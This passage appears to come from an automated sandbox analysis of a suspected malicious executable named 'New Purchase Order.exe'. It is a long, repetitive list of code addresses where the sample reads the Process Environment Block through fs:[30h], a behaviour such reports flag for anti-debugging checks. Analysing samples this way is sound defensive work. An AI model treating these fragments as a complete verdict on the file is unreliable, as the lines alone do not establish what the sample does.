                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017720DE mov eax, dword ptr fs:[00000030h]8_2_017720DE
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017B60B8 mov eax, dword ptr fs:[00000030h]8_2_017B60B8
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017B60B8 mov ecx, dword ptr fs:[00000030h]8_2_017B60B8
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016E80A0 mov eax, dword ptr fs:[00000030h]8_2_016E80A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017880A8 mov eax, dword ptr fs:[00000030h]8_2_017880A8
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F208A mov eax, dword ptr fs:[00000030h]8_2_016F208A
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0179437C mov eax, dword ptr fs:[00000030h]8_2_0179437C
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017BA352 mov eax, dword ptr fs:[00000030h]8_2_017BA352
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01798350 mov ecx, dword ptr fs:[00000030h]8_2_01798350
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0177035C mov eax, dword ptr fs:[00000030h]8_2_0177035C
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0177035C mov eax, dword ptr fs:[00000030h]8_2_0177035C
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0177035C mov eax, dword ptr fs:[00000030h]8_2_0177035C
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0177035C mov ecx, dword ptr fs:[00000030h]8_2_0177035C
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0177035C mov eax, dword ptr fs:[00000030h]8_2_0177035C
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0177035C mov eax, dword ptr fs:[00000030h]8_2_0177035C
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017C634F mov eax, dword ptr fs:[00000030h]8_2_017C634F
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01772349 mov eax, dword ptr fs:[00000030h]8_2_01772349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01772349 mov eax, dword ptr fs:[00000030h]8_2_01772349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01772349 mov eax, dword ptr fs:[00000030h]8_2_01772349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01772349 mov eax, dword ptr fs:[00000030h]8_2_01772349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01772349 mov eax, dword ptr fs:[00000030h]8_2_01772349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01772349 mov eax, dword ptr fs:[00000030h]8_2_01772349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01772349 mov eax, dword ptr fs:[00000030h]8_2_01772349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01772349 mov eax, dword ptr fs:[00000030h]8_2_01772349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01772349 mov eax, dword ptr fs:[00000030h]8_2_01772349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01772349 mov eax, dword ptr fs:[00000030h]8_2_01772349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01772349 mov eax, dword ptr fs:[00000030h]8_2_01772349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01772349 mov eax, dword ptr fs:[00000030h]8_2_01772349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01772349 mov eax, dword ptr fs:[00000030h]8_2_01772349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01772349 mov eax, dword ptr fs:[00000030h]8_2_01772349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01772349 mov eax, dword ptr fs:[00000030h]8_2_01772349
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017C8324 mov eax, dword ptr fs:[00000030h]8_2_017C8324
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017C8324 mov ecx, dword ptr fs:[00000030h]8_2_017C8324
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017C8324 mov eax, dword ptr fs:[00000030h]8_2_017C8324
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017C8324 mov eax, dword ptr fs:[00000030h]8_2_017C8324
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01710310 mov ecx, dword ptr fs:[00000030h]8_2_01710310
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172A30B mov eax, dword ptr fs:[00000030h]8_2_0172A30B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172A30B mov eax, dword ptr fs:[00000030h]8_2_0172A30B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172A30B mov eax, dword ptr fs:[00000030h]8_2_0172A30B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016EC310 mov ecx, dword ptr fs:[00000030h]8_2_016EC310
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0170E3F0 mov eax, dword ptr fs:[00000030h]8_2_0170E3F0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0170E3F0 mov eax, dword ptr fs:[00000030h]8_2_0170E3F0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0170E3F0 mov eax, dword ptr fs:[00000030h]8_2_0170E3F0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017263FF mov eax, dword ptr fs:[00000030h]8_2_017263FF
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017003E9 mov eax, dword ptr fs:[00000030h]8_2_017003E9
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017003E9 mov eax, dword ptr fs:[00000030h]8_2_017003E9
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017003E9 mov eax, dword ptr fs:[00000030h]8_2_017003E9
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017003E9 mov eax, dword ptr fs:[00000030h]8_2_017003E9
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017003E9 mov eax, dword ptr fs:[00000030h]8_2_017003E9
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017003E9 mov eax, dword ptr fs:[00000030h]8_2_017003E9
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017003E9 mov eax, dword ptr fs:[00000030h]8_2_017003E9
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017003E9 mov eax, dword ptr fs:[00000030h]8_2_017003E9
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0179E3DB mov eax, dword ptr fs:[00000030h]8_2_0179E3DB
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0179E3DB mov eax, dword ptr fs:[00000030h]8_2_0179E3DB
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0179E3DB mov ecx, dword ptr fs:[00000030h]8_2_0179E3DB
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0179E3DB mov eax, dword ptr fs:[00000030h]8_2_0179E3DB
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017943D4 mov eax, dword ptr fs:[00000030h]8_2_017943D4
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017943D4 mov eax, dword ptr fs:[00000030h]8_2_017943D4
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016FA3C0 mov eax, dword ptr fs:[00000030h]8_2_016FA3C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016FA3C0 mov eax, dword ptr fs:[00000030h]8_2_016FA3C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016FA3C0 mov eax, dword ptr fs:[00000030h]8_2_016FA3C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016FA3C0 mov eax, dword ptr fs:[00000030h]8_2_016FA3C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016FA3C0 mov eax, dword ptr fs:[00000030h]8_2_016FA3C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016FA3C0 mov eax, dword ptr fs:[00000030h]8_2_016FA3C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F83C0 mov eax, dword ptr fs:[00000030h]8_2_016F83C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F83C0 mov eax, dword ptr fs:[00000030h]8_2_016F83C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F83C0 mov eax, dword ptr fs:[00000030h]8_2_016F83C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F83C0 mov eax, dword ptr fs:[00000030h]8_2_016F83C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017AC3CD mov eax, dword ptr fs:[00000030h]8_2_017AC3CD
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017763C0 mov eax, dword ptr fs:[00000030h]8_2_017763C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016EE388 mov eax, dword ptr fs:[00000030h]8_2_016EE388
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016EE388 mov eax, dword ptr fs:[00000030h]8_2_016EE388
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016EE388 mov eax, dword ptr fs:[00000030h]8_2_016EE388
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016E8397 mov eax, dword ptr fs:[00000030h]8_2_016E8397
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016E8397 mov eax, dword ptr fs:[00000030h]8_2_016E8397
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016E8397 mov eax, dword ptr fs:[00000030h]8_2_016E8397
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0171438F mov eax, dword ptr fs:[00000030h]8_2_0171438F
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0171438F mov eax, dword ptr fs:[00000030h]8_2_0171438F
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016E826B mov eax, dword ptr fs:[00000030h]8_2_016E826B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017A0274 mov eax, dword ptr fs:[00000030h]8_2_017A0274
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017A0274 mov eax, dword ptr fs:[00000030h]8_2_017A0274
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017A0274 mov eax, dword ptr fs:[00000030h]8_2_017A0274
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017A0274 mov eax, dword ptr fs:[00000030h]8_2_017A0274
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017A0274 mov eax, dword ptr fs:[00000030h]8_2_017A0274
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017A0274 mov eax, dword ptr fs:[00000030h]8_2_017A0274
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017A0274 mov eax, dword ptr fs:[00000030h]8_2_017A0274
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017A0274 mov eax, dword ptr fs:[00000030h]8_2_017A0274
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017A0274 mov eax, dword ptr fs:[00000030h]8_2_017A0274
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017A0274 mov eax, dword ptr fs:[00000030h]8_2_017A0274
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017A0274 mov eax, dword ptr fs:[00000030h]8_2_017A0274
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017A0274 mov eax, dword ptr fs:[00000030h]8_2_017A0274
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F4260 mov eax, dword ptr fs:[00000030h]8_2_016F4260
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F4260 mov eax, dword ptr fs:[00000030h]8_2_016F4260
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F4260 mov eax, dword ptr fs:[00000030h]8_2_016F4260
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017C625D mov eax, dword ptr fs:[00000030h]8_2_017C625D
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017AA250 mov eax, dword ptr fs:[00000030h]8_2_017AA250
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017AA250 mov eax, dword ptr fs:[00000030h]8_2_017AA250
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01778243 mov eax, dword ptr fs:[00000030h]8_2_01778243
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01778243 mov ecx, dword ptr fs:[00000030h]8_2_01778243
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F6259 mov eax, dword ptr fs:[00000030h]8_2_016F6259
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016EA250 mov eax, dword ptr fs:[00000030h]8_2_016EA250
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016E823B mov eax, dword ptr fs:[00000030h]8_2_016E823B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017002E1 mov eax, dword ptr fs:[00000030h]8_2_017002E1
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017002E1 mov eax, dword ptr fs:[00000030h]8_2_017002E1
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017002E1 mov eax, dword ptr fs:[00000030h]8_2_017002E1
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017C62D6 mov eax, dword ptr fs:[00000030h]8_2_017C62D6
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016FA2C3 mov eax, dword ptr fs:[00000030h]8_2_016FA2C3
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016FA2C3 mov eax, dword ptr fs:[00000030h]8_2_016FA2C3
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016FA2C3 mov eax, dword ptr fs:[00000030h]8_2_016FA2C3
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016FA2C3 mov eax, dword ptr fs:[00000030h]8_2_016FA2C3
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016FA2C3 mov eax, dword ptr fs:[00000030h]8_2_016FA2C3
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017002A0 mov eax, dword ptr fs:[00000030h]8_2_017002A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017002A0 mov eax, dword ptr fs:[00000030h]8_2_017002A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017862A0 mov eax, dword ptr fs:[00000030h]8_2_017862A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017862A0 mov ecx, dword ptr fs:[00000030h]8_2_017862A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017862A0 mov eax, dword ptr fs:[00000030h]8_2_017862A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017862A0 mov eax, dword ptr fs:[00000030h]8_2_017862A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017862A0 mov eax, dword ptr fs:[00000030h]8_2_017862A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017862A0 mov eax, dword ptr fs:[00000030h]8_2_017862A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01770283 mov eax, dword ptr fs:[00000030h]8_2_01770283
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01770283 mov eax, dword ptr fs:[00000030h]8_2_01770283
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01770283 mov eax, dword ptr fs:[00000030h]8_2_01770283
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172E284 mov eax, dword ptr fs:[00000030h]8_2_0172E284
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172E284 mov eax, dword ptr fs:[00000030h]8_2_0172E284
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172656A mov eax, dword ptr fs:[00000030h]8_2_0172656A
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172656A mov eax, dword ptr fs:[00000030h]8_2_0172656A
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172656A mov eax, dword ptr fs:[00000030h]8_2_0172656A
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F8550 mov eax, dword ptr fs:[00000030h]8_2_016F8550
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F8550 mov eax, dword ptr fs:[00000030h]8_2_016F8550
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01700535 mov eax, dword ptr fs:[00000030h]8_2_01700535
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01700535 mov eax, dword ptr fs:[00000030h]8_2_01700535
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01700535 mov eax, dword ptr fs:[00000030h]8_2_01700535
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01700535 mov eax, dword ptr fs:[00000030h]8_2_01700535
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01700535 mov eax, dword ptr fs:[00000030h]8_2_01700535
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01700535 mov eax, dword ptr fs:[00000030h]8_2_01700535
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0171E53E mov eax, dword ptr fs:[00000030h]8_2_0171E53E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0171E53E mov eax, dword ptr fs:[00000030h]8_2_0171E53E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0171E53E mov eax, dword ptr fs:[00000030h]8_2_0171E53E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0171E53E mov eax, dword ptr fs:[00000030h]8_2_0171E53E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0171E53E mov eax, dword ptr fs:[00000030h]8_2_0171E53E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01786500 mov eax, dword ptr fs:[00000030h]8_2_01786500
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017C4500 mov eax, dword ptr fs:[00000030h]8_2_017C4500
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017C4500 mov eax, dword ptr fs:[00000030h]8_2_017C4500
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017C4500 mov eax, dword ptr fs:[00000030h]8_2_017C4500
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017C4500 mov eax, dword ptr fs:[00000030h]8_2_017C4500
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017C4500 mov eax, dword ptr fs:[00000030h]8_2_017C4500
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017C4500 mov eax, dword ptr fs:[00000030h]8_2_017C4500
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017C4500 mov eax, dword ptr fs:[00000030h]8_2_017C4500
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F25E0 mov eax, dword ptr fs:[00000030h]8_2_016F25E0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0171E5E7 mov eax, dword ptr fs:[00000030h]8_2_0171E5E7
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0171E5E7 mov eax, dword ptr fs:[00000030h]8_2_0171E5E7
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0171E5E7 mov eax, dword ptr fs:[00000030h]8_2_0171E5E7
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0171E5E7 mov eax, dword ptr fs:[00000030h]8_2_0171E5E7
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0171E5E7 mov eax, dword ptr fs:[00000030h]8_2_0171E5E7
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0171E5E7 mov eax, dword ptr fs:[00000030h]8_2_0171E5E7
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0171E5E7 mov eax, dword ptr fs:[00000030h]8_2_0171E5E7
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0171E5E7 mov eax, dword ptr fs:[00000030h]8_2_0171E5E7
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172C5ED mov eax, dword ptr fs:[00000030h]8_2_0172C5ED
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172C5ED mov eax, dword ptr fs:[00000030h]8_2_0172C5ED
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172A5D0 mov eax, dword ptr fs:[00000030h]8_2_0172A5D0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172A5D0 mov eax, dword ptr fs:[00000030h]8_2_0172A5D0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172E5CF mov eax, dword ptr fs:[00000030h]8_2_0172E5CF
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172E5CF mov eax, dword ptr fs:[00000030h]8_2_0172E5CF
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F65D0 mov eax, dword ptr fs:[00000030h]8_2_016F65D0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017145B1 mov eax, dword ptr fs:[00000030h]8_2_017145B1
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017145B1 mov eax, dword ptr fs:[00000030h]8_2_017145B1
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017705A7 mov eax, dword ptr fs:[00000030h]8_2_017705A7
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017705A7 mov eax, dword ptr fs:[00000030h]8_2_017705A7
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017705A7 mov eax, dword ptr fs:[00000030h]8_2_017705A7
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F2582 mov eax, dword ptr fs:[00000030h]8_2_016F2582
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F2582 mov ecx, dword ptr fs:[00000030h]8_2_016F2582
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172E59C mov eax, dword ptr fs:[00000030h]8_2_0172E59C
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01724588 mov eax, dword ptr fs:[00000030h]8_2_01724588
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0171A470 mov eax, dword ptr fs:[00000030h]8_2_0171A470
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0171A470 mov eax, dword ptr fs:[00000030h]8_2_0171A470
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0171A470 mov eax, dword ptr fs:[00000030h]8_2_0171A470
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0177C460 mov ecx, dword ptr fs:[00000030h]8_2_0177C460
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0171245A mov eax, dword ptr fs:[00000030h]8_2_0171245A
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017AA456 mov eax, dword ptr fs:[00000030h]8_2_017AA456
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172E443 mov eax, dword ptr fs:[00000030h]8_2_0172E443
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172E443 mov eax, dword ptr fs:[00000030h]8_2_0172E443
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172E443 mov eax, dword ptr fs:[00000030h]8_2_0172E443
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172E443 mov eax, dword ptr fs:[00000030h]8_2_0172E443
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172E443 mov eax, dword ptr fs:[00000030h]8_2_0172E443
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172E443 mov eax, dword ptr fs:[00000030h]8_2_0172E443
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172E443 mov eax, dword ptr fs:[00000030h]8_2_0172E443
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172E443 mov eax, dword ptr fs:[00000030h]8_2_0172E443
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016E645D mov eax, dword ptr fs:[00000030h]8_2_016E645D
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172A430 mov eax, dword ptr fs:[00000030h]8_2_0172A430
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016EC427 mov eax, dword ptr fs:[00000030h]8_2_016EC427
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016EE420 mov eax, dword ptr fs:[00000030h]8_2_016EE420
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016EE420 mov eax, dword ptr fs:[00000030h]8_2_016EE420
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016EE420 mov eax, dword ptr fs:[00000030h]8_2_016EE420
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01776420 mov eax, dword ptr fs:[00000030h]8_2_01776420
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01776420 mov eax, dword ptr fs:[00000030h]8_2_01776420
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01776420 mov eax, dword ptr fs:[00000030h]8_2_01776420
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01776420 mov eax, dword ptr fs:[00000030h]8_2_01776420
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01776420 mov eax, dword ptr fs:[00000030h]8_2_01776420
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01776420 mov eax, dword ptr fs:[00000030h]8_2_01776420
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01776420 mov eax, dword ptr fs:[00000030h]8_2_01776420
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01728402 mov eax, dword ptr fs:[00000030h]8_2_01728402
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01728402 mov eax, dword ptr fs:[00000030h]8_2_01728402
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01728402 mov eax, dword ptr fs:[00000030h]8_2_01728402
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F04E5 mov ecx, dword ptr fs:[00000030h]8_2_016F04E5
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017244B0 mov ecx, dword ptr fs:[00000030h]8_2_017244B0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F64AB mov eax, dword ptr fs:[00000030h]8_2_016F64AB
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0177A4B0 mov eax, dword ptr fs:[00000030h]8_2_0177A4B0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017AA49A mov eax, dword ptr fs:[00000030h]8_2_017AA49A
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01700770 mov eax, dword ptr fs:[00000030h]8_2_01700770
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01700770 mov eax, dword ptr fs:[00000030h]8_2_01700770
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01700770 mov eax, dword ptr fs:[00000030h]8_2_01700770
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01700770 mov eax, dword ptr fs:[00000030h]8_2_01700770
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01700770 mov eax, dword ptr fs:[00000030h]8_2_01700770
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01700770 mov eax, dword ptr fs:[00000030h]8_2_01700770
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01700770 mov eax, dword ptr fs:[00000030h]8_2_01700770
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01700770 mov eax, dword ptr fs:[00000030h]8_2_01700770
